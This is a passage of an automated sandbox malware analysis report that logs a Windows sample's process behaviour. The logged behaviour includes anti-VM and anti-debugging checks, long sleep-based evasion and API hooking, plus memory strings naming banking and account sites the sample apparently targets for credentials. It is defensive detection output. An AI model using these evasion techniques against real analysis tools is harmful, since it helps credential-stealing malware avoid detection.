                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: n2pGr8w21V.exe PID: 2620, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: uEugNEto.exe PID: 7852, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\systray.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: 4EB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: 9470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: A470000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: A690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeMemory allocated: B690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: 92A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: A2A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: A4B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeMemory allocated: B4B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D096E rdtsc 15_2_015D096E
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2951Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4061Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeWindow / User API: threadDelayed 9794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.3 %
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe TID: 6364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 2951 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe TID: 7928Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020Thread sleep count: 180 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020Thread sleep count: 9794 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020Thread sleep time: -19588000s >= -30000s
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe TID: 2980Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231n
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: H846yjBj.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: H846yjBj.23.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231t
                Source: H846yjBj.23.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soft.com/profileVMware20
                Source: H846yjBj.23.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saction PasswordVMware20
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ist test formVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: H846yjBj.23.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .co.inVMware20,11696492231d
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20l
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,116
                Source: H846yjBj.23.drBinary or memory string: discord.comVMware20,11696492231f
                Source: H846yjBj.23.drBinary or memory string: global block list test formVMware20,11696492231
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2511279210.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                Source: H846yjBj.23.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: H846yjBj.23.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.co.inVMware20X
                Source: H846yjBj.23.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: H846yjBj.23.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231}
                Source: H846yjBj.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: H846yjBj.23.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: H846yjBj.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs - HKVMware20,11696492231]
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: H846yjBj.23.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,1169649223g
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nteractive Brokers - EU East & CentralVMware20,11696492231
                Source: H846yjBj.23.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: firefox.exe, 0000001A.00000002.1882377637.00000184B529C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: H846yjBj.23.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: H846yjBj.23.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: H846yjBj.23.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: H846yjBj.23.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivebrokers.comVMware20,1<
                Source: H846yjBj.23.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D096E rdtsc 15_2_015D096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00417853 LdrLoadDll,15_2_00417853
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596154 mov eax, dword ptr fs:[00000030h]15_2_01596154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01596154 mov eax, dword ptr fs:[00000030h]15_2_01596154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C156 mov eax, dword ptr fs:[00000030h]15_2_0158C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01624144 mov eax, dword ptr fs:[00000030h]15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01624144 mov eax, dword ptr fs:[00000030h]15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01624144 mov ecx, dword ptr fs:[00000030h]15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01624144 mov eax, dword ptr fs:[00000030h]15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01624144 mov eax, dword ptr fs:[00000030h]15_2_01624144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01628158 mov eax, dword ptr fs:[00000030h]15_2_01628158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov eax, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163E10E mov ecx, dword ptr fs:[00000030h]15_2_0163E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01650115 mov eax, dword ptr fs:[00000030h]15_2_01650115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C0124 mov eax, dword ptr fs:[00000030h]15_2_015C0124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163A118 mov ecx, dword ptr fs:[00000030h]15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h]15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h]15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163A118 mov eax, dword ptr fs:[00000030h]15_2_0163A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016661E5 mov eax, dword ptr fs:[00000030h]15_2_016661E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015C01F8 mov eax, dword ptr fs:[00000030h]15_2_015C01F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016561C3 mov eax, dword ptr fs:[00000030h]15_2_016561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016561C3 mov eax, dword ptr fs:[00000030h]15_2_016561C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h]15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h]15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E1D0 mov ecx, dword ptr fs:[00000030h]15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h]15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0160E1D0 mov eax, dword ptr fs:[00000030h]15_2_0160E1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h]15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h]15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A197 mov eax, dword ptr fs:[00000030h]15_2_0158A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D0185 mov eax, dword ptr fs:[00000030h]15_2_015D0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01634180 mov eax, dword ptr fs:[00000030h]15_2_01634180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01634180 mov eax, dword ptr fs:[00000030h]15_2_01634180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164C188 mov eax, dword ptr fs:[00000030h]15_2_0164C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0164C188 mov eax, dword ptr fs:[00000030h]15_2_0164C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161019F mov eax, dword ptr fs:[00000030h]15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161019F mov eax, dword ptr fs:[00000030h]15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161019F mov eax, dword ptr fs:[00000030h]15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0161019F mov eax, dword ptr fs:[00000030h]15_2_0161019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01592050 mov eax, dword ptr fs:[00000030h]15_2_01592050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015BC073 mov eax, dword ptr fs:[00000030h]15_2_015BC073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01616050 mov eax, dword ptr fs:[00000030h]15_2_01616050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015AE016 mov eax, dword ptr fs:[00000030h]15_2_015AE016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01626030 mov eax, dword ptr fs:[00000030h]15_2_01626030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01614000 mov ecx, dword ptr fs:[00000030h]15_2_01614000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01632000 mov eax, dword ptr fs:[00000030h]15_2_01632000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A020 mov eax, dword ptr fs:[00000030h]15_2_0158A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C020 mov eax, dword ptr fs:[00000030h]15_2_0158C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016160E0 mov eax, dword ptr fs:[00000030h]15_2_016160E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158C0F0 mov eax, dword ptr fs:[00000030h]15_2_0158C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015D20F0 mov ecx, dword ptr fs:[00000030h]15_2_015D20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015980E9 mov eax, dword ptr fs:[00000030h]15_2_015980E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0158A0E3 mov ecx, dword ptr fs:[00000030h]15_2_0158A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016120DE mov eax, dword ptr fs:[00000030h]15_2_016120DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016280A8 mov eax, dword ptr fs:[00000030h]15_2_016280A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0159208A mov eax, dword ptr fs:[00000030h]15_2_0159208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016560B8 mov eax, dword ptr fs:[00000030h]15_2_016560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_016560B8 mov ecx, dword ptr fs:[00000030h]15_2_016560B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0163437C mov eax, dword ptr fs:[00000030h]15_2_0163437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01612349 mov eax, dword ptr fs:[00000030h]15_2_01612349
